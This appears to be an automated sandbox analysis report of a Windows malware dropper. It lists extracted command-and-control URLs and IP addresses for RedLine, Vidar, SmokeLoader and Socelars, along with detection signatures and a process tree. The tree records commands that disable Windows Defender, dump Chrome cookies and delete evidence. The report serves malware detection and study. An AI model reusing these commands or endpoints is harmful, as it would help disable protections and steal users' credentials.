Analysis
-
max time kernel
145s -
max time network
163s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
23/12/2021, 13:27
Static task
static1
General
-
Target
5c416961f6d7c90d805c17130cd7ceb38c76125a38e923bedfc54bc98afd46ba.exe
-
Size
6.8MB
-
MD5
19a783e43f4d7b841ef4a678b6cab04b
-
SHA1
02cda91e2213d13c82ab5cfd0a3c0a56b2cfb3b9
-
SHA256
5c416961f6d7c90d805c17130cd7ceb38c76125a38e923bedfc54bc98afd46ba
-
SHA512
2cfc3315d04dd045f4d3b5e47300b395118fa7dbf4243a9555087c03feb81650f6c5d5d46ecdc99ab44e42cc3f76827fc9f83e65bc5b789de6aa1e078bf03e04
Malware Config
Extracted
socelars
http://www.biohazardgraphics.com/
Extracted
vidar
49.2
915
https://mstdn.social/@kipriauk9
https://qoto.org/@kipriauk8
-
profile_id
915
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
media22ns
65.108.69.168:13293
Extracted
redline
userv1
159.69.246.184:13127
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3876 4696 rundll32.exe 134 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 20 IoCs
resource yara_rule behavioral2/memory/4560-318-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/4560-319-0x0000000000419336-mapping.dmp family_redline behavioral2/memory/4560-320-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/4560-321-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/4644-326-0x000000000041932A-mapping.dmp family_redline behavioral2/memory/4644-324-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/5148-421-0x0000000000350000-0x00000000004D9000-memory.dmp family_redline behavioral2/memory/4012-441-0x0000000000EA0000-0x0000000001068000-memory.dmp family_redline behavioral2/memory/4608-436-0x0000000000C60000-0x0000000000E28000-memory.dmp family_redline behavioral2/memory/4820-435-0x0000000000DA0000-0x0000000000F68000-memory.dmp family_redline behavioral2/memory/4504-434-0x00000000000E0000-0x00000000002A8000-memory.dmp family_redline behavioral2/memory/3984-433-0x0000000000D70000-0x0000000000F37000-memory.dmp family_redline behavioral2/memory/5140-431-0x00000000003D0000-0x0000000000597000-memory.dmp family_redline behavioral2/memory/4504-419-0x00000000000E0000-0x00000000002A8000-memory.dmp family_redline behavioral2/memory/4608-423-0x0000000000C60000-0x0000000000E28000-memory.dmp family_redline behavioral2/memory/4820-422-0x0000000000DA0000-0x0000000000F68000-memory.dmp family_redline behavioral2/memory/2740-416-0x0000000000330000-0x00000000004B9000-memory.dmp family_redline behavioral2/memory/4012-418-0x0000000000EA0000-0x0000000001068000-memory.dmp family_redline behavioral2/memory/3984-420-0x0000000000D70000-0x0000000000F37000-memory.dmp family_redline behavioral2/memory/5140-417-0x00000000003D0000-0x0000000000597000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000500000001ab30-198.dat family_socelars behavioral2/files/0x000500000001ab30-166.dat family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/files/0x000500000001ab25-160.dat WebBrowserPassView behavioral2/files/0x000500000001ab25-204.dat WebBrowserPassView behavioral2/memory/4540-316-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 6 IoCs
resource yara_rule behavioral2/files/0x000500000001ab25-160.dat Nirsoft behavioral2/files/0x000500000001ab25-204.dat Nirsoft behavioral2/files/0x000600000001ab38-289.dat Nirsoft behavioral2/files/0x000600000001ab38-290.dat Nirsoft behavioral2/memory/4192-291-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft behavioral2/memory/4540-316-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft -
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/1196-255-0x0000000000400000-0x00000000008B0000-memory.dmp family_vidar behavioral2/memory/1196-257-0x0000000000EA0000-0x0000000000F75000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x000500000001ab19-126.dat aspack_v212_v242 behavioral2/files/0x000500000001ab19-127.dat aspack_v212_v242 behavioral2/files/0x000500000001ab1a-125.dat aspack_v212_v242 behavioral2/files/0x000500000001ab1a-132.dat aspack_v212_v242 behavioral2/files/0x000600000001ab1c-133.dat aspack_v212_v242 behavioral2/files/0x000600000001ab1c-134.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 36 IoCs
pid Process 504 setup_installer.exe 688 setup_install.exe 1248 Thu079294186b.exe 596 Thu07591e8932000a1.exe 3388 Thu0785d39bed3127.exe 3020 Thu0758285c76.exe 1196 Thu0733ed8a825a025a.exe 1476 Thu07d03cbff47c.exe 2308 Thu07f9ae12c2bc.exe 3960 Thu0786f9df93.exe 3124 Thu073b8d0217a8b45b.exe 3548 Thu0758285c76.exe 1276 Thu0759a981db.exe 1868 Thu077e2e75cb9448.exe 64 Thu0782554cbdd5d.exe 2108 Thu07ee83176e465e.exe 1392 Thu0730ece8e29065b7.exe 2472 Thu0784ab7efb72.exe 2468 Thu0784ab7efb72.exe 3588 Thu0785d39bed3127.tmp 2144 Thu0785d39bed3127.exe 8 Thu0785d39bed3127.tmp 4192 11111.exe 4432 windllhost.exe 4488 k195ieHUpMQS9BkZhyv36wqb.exe 4540 11111.exe 4620 rE0s2I5YsAkrhL0rwm2cMGMH.exe 4528 Thu079294186b.exe 4560 Thu077e2e75cb9448.exe 4644 Thu079294186b.exe 5020 oya9N3Li2HXd9xHDwHicTRmV.exe 4248 MFufgG4RPPu9X3FVrkyUMnoO.exe 4216 MTyK4gskUw6YvSYsi0YlrPO4.exe 5032 YNibrz7xz5HGgHLpNO730UWR.exe 4328 CRDSMHIqt6CbyEhVfbmL7kwQ.exe 4968 LMxXWBiVFvBjbrtWzyP_wXTD.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\International\Geo\Nation Thu07d03cbff47c.exe Key value queried \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\International\Geo\Nation Thu0782554cbdd5d.exe -
Loads dropped DLL 15 IoCs
pid Process 688 setup_install.exe 688 setup_install.exe 688 setup_install.exe 688 setup_install.exe 688 setup_install.exe 688 setup_install.exe 3588 Thu0785d39bed3127.tmp 8 Thu0785d39bed3127.tmp 4168 rundll32.exe 4168 rundll32.exe 4272 rundll32.exe 4272 rundll32.exe 1196 Thu0733ed8a825a025a.exe 1196 Thu0733ed8a825a025a.exe 3936 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 32 ip-api.com 66 ipinfo.io 67 ipinfo.io 70 ipinfo.io 324 ipinfo.io 325 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2472 set thread context of 2468 2472 Thu0784ab7efb72.exe 95 PID 1868 set thread context of 4560 1868 Thu077e2e75cb9448.exe 128 PID 1248 set thread context of 4644 1248 Thu079294186b.exe 131 -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\FarLabUninstaller\is-PS0KN.tmp Thu0785d39bed3127.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Thu0785d39bed3127.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Thu0785d39bed3127.tmp -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 4416 3124 WerFault.exe 92 4532 5020 WerFault.exe 139 3052 1276 WerFault.exe 93 6020 3548 WerFault.exe 183 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu0786f9df93.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu0786f9df93.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu0786f9df93.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Thu0733ed8a825a025a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Thu0733ed8a825a025a.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2184 schtasks.exe 6964 schtasks.exe -
Kills process with taskkill 3 IoCs
pid Process 4712 taskkill.exe 7128 taskkill.exe 4704 taskkill.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings Thu07ee83176e465e.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings Thu0730ece8e29065b7.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{MEDLD6HQ-HMC1-A72R-W7DD-6QKQNAKGDK16} rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{MEDLD6HQ-HMC1-A72R-W7DD-6QKQNAKGDK16}\1 = "2303" rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{LKUSM4YW-RLK6-V57D-W2PM-7MZYLOJMUR24} rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Process not Found Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Process not Found -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 35 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3960 Thu0786f9df93.exe 3960 Thu0786f9df93.exe 2760 powershell.exe 2760 powershell.exe 1808 powershell.exe 1808 powershell.exe 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3960 Thu0786f9df93.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 596 Thu07591e8932000a1.exe Token: SeCreateTokenPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeAssignPrimaryTokenPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeLockMemoryPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeIncreaseQuotaPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeMachineAccountPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeTcbPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeSecurityPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeTakeOwnershipPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeLoadDriverPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeSystemProfilePrivilege 2308 Thu07f9ae12c2bc.exe Token: SeSystemtimePrivilege 2308 Thu07f9ae12c2bc.exe Token: SeProfSingleProcessPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeIncBasePriorityPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeCreatePagefilePrivilege 2308 Thu07f9ae12c2bc.exe Token: SeCreatePermanentPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeBackupPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeRestorePrivilege 2308 Thu07f9ae12c2bc.exe Token: SeShutdownPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeDebugPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeAuditPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeSystemEnvironmentPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeChangeNotifyPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeRemoteShutdownPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeUndockPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeSyncAgentPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeEnableDelegationPrivilege 2308 Thu07f9ae12c2bc.exe Token: SeManageVolumePrivilege 2308 Thu07f9ae12c2bc.exe Token: SeImpersonatePrivilege 2308 Thu07f9ae12c2bc.exe Token: SeCreateGlobalPrivilege 2308 Thu07f9ae12c2bc.exe Token: 31 2308 Thu07f9ae12c2bc.exe Token: 32 2308 Thu07f9ae12c2bc.exe Token: 33 2308 Thu07f9ae12c2bc.exe Token: 34 2308 Thu07f9ae12c2bc.exe Token: 35 2308 Thu07f9ae12c2bc.exe Token: SeDebugPrivilege 1248 Thu079294186b.exe Token: SeDebugPrivilege 1868 Thu077e2e75cb9448.exe Token: SeDebugPrivilege 3124 Thu073b8d0217a8b45b.exe Token: SeDebugPrivilege 2760 powershell.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 8 Thu0785d39bed3127.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3176 wrote to memory of 504 3176 5c416961f6d7c90d805c17130cd7ceb38c76125a38e923bedfc54bc98afd46ba.exe 69 PID 3176 wrote to memory of 504 3176 5c416961f6d7c90d805c17130cd7ceb38c76125a38e923bedfc54bc98afd46ba.exe 69 PID 3176 wrote to memory of 504 3176 5c416961f6d7c90d805c17130cd7ceb38c76125a38e923bedfc54bc98afd46ba.exe 69 PID 504 wrote to memory of 688 504 setup_installer.exe 70 PID 504 wrote to memory of 688 504 setup_installer.exe 70 PID 504 wrote to memory of 688 504 setup_installer.exe 70 PID 688 wrote to memory of 3560 688 setup_install.exe 73 PID 688 wrote to memory of 3560 688 setup_install.exe 73 PID 688 wrote to memory of 3560 688 setup_install.exe 73 PID 688 wrote to memory of 3720 688 setup_install.exe 74 PID 688 wrote to memory of 3720 688 setup_install.exe 74 PID 688 wrote to memory of 3720 688 setup_install.exe 74 PID 688 wrote to memory of 740 688 setup_install.exe 75 PID 688 wrote to memory of 740 688 setup_install.exe 75 PID 688 wrote to memory of 740 688 setup_install.exe 75 PID 688 wrote to memory of 2880 688 setup_install.exe 76 PID 688 wrote to memory of 2880 688 setup_install.exe 76 PID 688 wrote to memory of 2880 688 setup_install.exe 76 PID 688 wrote to memory of 1760 688 setup_install.exe 77 PID 688 wrote to memory of 1760 688 setup_install.exe 77 PID 688 wrote to memory of 1760 688 setup_install.exe 77 PID 688 wrote to memory of 1528 688 setup_install.exe 81 PID 688 wrote to memory of 1528 688 setup_install.exe 81 PID 688 wrote to memory of 1528 688 setup_install.exe 81 PID 688 wrote to memory of 1776 688 setup_install.exe 78 PID 688 wrote to memory of 1776 688 setup_install.exe 78 PID 688 wrote to memory of 1776 688 setup_install.exe 78 PID 688 wrote to memory of 668 688 setup_install.exe 79 PID 688 wrote to memory of 668 688 setup_install.exe 79 PID 688 wrote to memory of 668 688 setup_install.exe 79 PID 688 wrote to memory of 368 688 setup_install.exe 82 PID 688 wrote to memory of 368 688 setup_install.exe 82 PID 688 wrote to memory of 368 688 setup_install.exe 82 PID 688 wrote to memory of 676 688 setup_install.exe 84 PID 688 wrote to memory of 676 688 setup_install.exe 84 PID 688 wrote to memory of 676 688 setup_install.exe 84 PID 3560 wrote to memory of 2760 3560 cmd.exe 83 PID 3560 wrote to memory of 2760 3560 cmd.exe 83 PID 3560 wrote to memory of 2760 3560 cmd.exe 83 PID 3720 wrote to memory of 1808 3720 cmd.exe 112 PID 3720 wrote to memory of 1808 3720 cmd.exe 112 PID 3720 wrote to memory of 1808 3720 cmd.exe 112 PID 1760 wrote to memory of 596 1760 cmd.exe 80 PID 1760 wrote to memory of 596 1760 cmd.exe 80 PID 740 wrote to memory of 1248 740 cmd.exe 107 PID 740 wrote to memory of 1248 740 cmd.exe 107 PID 740 wrote to memory of 1248 740 cmd.exe 107 PID 688 wrote to memory of 3664 688 setup_install.exe 108 PID 688 wrote to memory of 3664 688 setup_install.exe 108 PID 688 wrote to memory of 3664 688 setup_install.exe 108 PID 2880 wrote to memory of 3388 2880 cmd.exe 105 PID 2880 wrote to memory of 3388 2880 cmd.exe 105 PID 2880 wrote to memory of 3388 2880 cmd.exe 105 PID 1528 wrote to memory of 3020 1528 cmd.exe 106 PID 1528 wrote to memory of 3020 1528 cmd.exe 106 PID 1528 wrote to memory of 3020 1528 cmd.exe 106 PID 1776 wrote to memory of 1196 1776 cmd.exe 85 PID 1776 wrote to memory of 1196 1776 cmd.exe 85 PID 1776 wrote to memory of 1196 1776 cmd.exe 85 PID 688 wrote to memory of 352 688 setup_install.exe 103 PID 688 wrote to memory of 352 688 setup_install.exe 103 PID 688 wrote to memory of 352 688 setup_install.exe 103 PID 688 wrote to memory of 2396 688 setup_install.exe 86 PID 688 wrote to memory of 2396 688 setup_install.exe 86
Processes
-
C:\Users\Admin\AppData\Local\Temp\5c416961f6d7c90d805c17130cd7ceb38c76125a38e923bedfc54bc98afd46ba.exe"C:\Users\Admin\AppData\Local\Temp\5c416961f6d7c90d805c17130cd7ceb38c76125a38e923bedfc54bc98afd46ba.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:504 -
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu079294186b.exe4⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu079294186b.exeThu079294186b.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1248 -
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu079294186b.exeC:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu079294186b.exe6⤵
- Executes dropped EXE
PID:4528
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu079294186b.exeC:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu079294186b.exe6⤵
- Executes dropped EXE
PID:4644
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0785d39bed3127.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0785d39bed3127.exeThu0785d39bed3127.exe5⤵
- Executes dropped EXE
PID:3388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu07591e8932000a1.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu07591e8932000a1.exeThu07591e8932000a1.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0733ed8a825a025a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0733ed8a825a025a.exeThu0733ed8a825a025a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1196 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Thu0733ed8a825a025a.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0733ed8a825a025a.exe" & del C:\ProgramData\*.dll & exit6⤵PID:4932
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Thu0733ed8a825a025a.exe /f7⤵
- Kills process with taskkill
PID:7128
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0759a981db.exe4⤵PID:668
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0759a981db.exeThu0759a981db.exe5⤵
- Executes dropped EXE
PID:1276 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:4192
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:4540
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1276 -s 8086⤵
- Program crash
PID:3052
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0758285c76.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0758285c76.exeThu0758285c76.exe5⤵
- Executes dropped EXE
PID:3020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0730ece8e29065b7.exe4⤵PID:368
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0730ece8e29065b7.exeThu0730ece8e29065b7.exe5⤵
- Executes dropped EXE
- Modifies registry class
PID:1392 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\2qmCD.Cpl",6⤵PID:2616
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\2qmCD.Cpl",7⤵
- Loads dropped DLL
PID:4168
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu07f9ae12c2bc.exe4⤵PID:676
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu07f9ae12c2bc.exeThu07f9ae12c2bc.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2308 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:4508
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4712
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0784ab7efb72.exe /mixtwo4⤵PID:2396
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0784ab7efb72.exeThu0784ab7efb72.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0784ab7efb72.exeThu0784ab7efb72.exe /mixtwo6⤵
- Executes dropped EXE
PID:2468 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Thu0784ab7efb72.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0784ab7efb72.exe" & exit7⤵PID:4320
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Thu0784ab7efb72.exe" /f8⤵
- Kills process with taskkill
PID:4704
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0782554cbdd5d.exe4⤵PID:1520
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0782554cbdd5d.exeThu0782554cbdd5d.exe5⤵
- Executes dropped EXE
- Checks computer location settings
PID:64 -
